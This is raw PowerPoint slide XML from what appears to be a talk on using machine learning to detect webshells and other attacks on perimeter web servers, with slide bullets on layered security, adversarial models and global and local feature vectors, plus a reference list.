                    <a:pt x="0" y="112837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241143" y="112837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482286" y="282092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="564183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="451346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="451346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="accent5">
                <a:hueOff val="-9333657"/>
                <a:satOff val="0"/>
                <a:lumOff val="21176"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-9333657"/>
                <a:satOff val="0"/>
                <a:lumOff val="21176"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="lt1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="0" tIns="112837" rIns="144686" bIns="112837" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="711200">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6644129" y="2048765"/>
              <a:ext cx="2274935" cy="1364961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY0" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX1" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX2" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX3" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY3" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX4" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY4" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX5" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY5" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX6" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY6" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY7" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY8" fmla="*/ 136496 h 136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935" h="1364961">
                  <a:moveTo>
                    <a:pt x="0" y="136496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61111"/>
                    <a:pt x="61111" y="0"/>
                    <a:pt x="136496" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2138439" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2213824" y="0"/>
                    <a:pt x="2274935" y="61111"/>
                    <a:pt x="2274935" y="136496"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2274935" y="1228465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2274935" y="1303850"/>
                    <a:pt x="2213824" y="1364961"/>
                    <a:pt x="2138439" y="1364961"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136496" y="1364961"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61111" y="1364961"/>
                    <a:pt x="0" y="1303850"/>
                    <a:pt x="0" y="1228465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="136496"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="accent5">
                <a:hueOff val="-9333657"/>
                <a:satOff val="0"/>
                <a:lumOff val="21176"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-9333657"/>
                <a:satOff val="0"/>
                <a:lumOff val="21176"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="lt1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="112368" tIns="112368" rIns="112368" bIns="112368" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="844550" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Exfiltration</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>50 files are sent out in small increments so not to trigger threshold rule</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294015" y="1114121"/>
            <a:ext cx="8605435" cy="1834820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Shades of Grey: Adding the Risk Together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>layered security approach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allows the mixture of signals from all the heterogeneous data sources and human input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single pain of glass builds the story of the each attack pattern laying out the proper trail of evidence in an explainable story</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436114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Advesarial Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="adversary-capability.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4356" b="2904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065070" y="1200151"/>
            <a:ext cx="4593031" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321599" y="1199324"/>
            <a:ext cx="1649918" cy="900246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="214313" indent="-214313">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Machine Learning Looses Effectiveness the more complex the adversary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6856081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Advesarial Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="adversary-capability.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4356" b="2904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065070" y="1200151"/>
            <a:ext cx="4593031" cy="3394472"/>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1260930" y="2286000"/>
            <a:ext cx="6467929" cy="2467429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640855" y="2657929"/>
            <a:ext cx="1424214" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Automatable Actions: Good for ML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640855" y="1357087"/>
            <a:ext cx="1424214" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Non-Automatable Actions: Hybrid Human/Computer Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1536451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 Time is Valuable!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288836" y="980197"/>
            <a:ext cx="7041604" cy="3557179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Googles Experience with ML in Cybersecurity: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web.stanford.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/class/cs259d/lectures/Session11.pdf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53" y="2010443"/>
            <a:ext cx="4149347" cy="2298894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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817" y="2010443"/>
            <a:ext cx="4149347" cy="2298894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116251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Webshells With ML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784090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Webshell Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1362295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Webshells With ML: References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Going beyond the Indicator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>vimeo.com/90687936</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Xin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Sun, Xindai Lu, and Hua Dai. 2017. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>A Matrix Decomposition based Webshell Detection Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Proceedings of the 2017 International Conference on Cryptography, Security and Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(ICCSP '17). ACM, New York, NY, USA, 66-70. DOI: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>doi.org/10.1145/3058060.3058083</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Ye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Fei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>; Gong Jian; Yang Wang; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Box Detection of Webshell Based on Support Vector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>School </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>of Computer Science and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Technology, Southeast University; Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Laboratory of Computer Network Technology of Jiangsu Province: http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3117514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Lambda Defense: Webshell Decomposition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076275"/>
            <a:ext cx="4041050" cy="3827163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1951546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Lambda Defense: Webshell Decomposition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076275"/>
            <a:ext cx="4041050" cy="3827163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4193450" y="2427791"/>
            <a:ext cx="4693920" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Global + Local Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17264391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How do we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detect W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>ML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1088450"/>
            <a:ext cx="8520600" cy="3849600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New approaches in machine learning and data science can help improve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detection of compromised perimeter assets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior (Dynamic + Static Content)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local Feature Vector Answers Questions Like: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How many times do users take a similar path on the webserver? How rare is this path a user is browsing from a statistics perspective?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Global Feature Vector Answers Questions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Like: How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>often does this webserver communicate with DMZ IP’s? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Is there a trust relationship that has changed?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
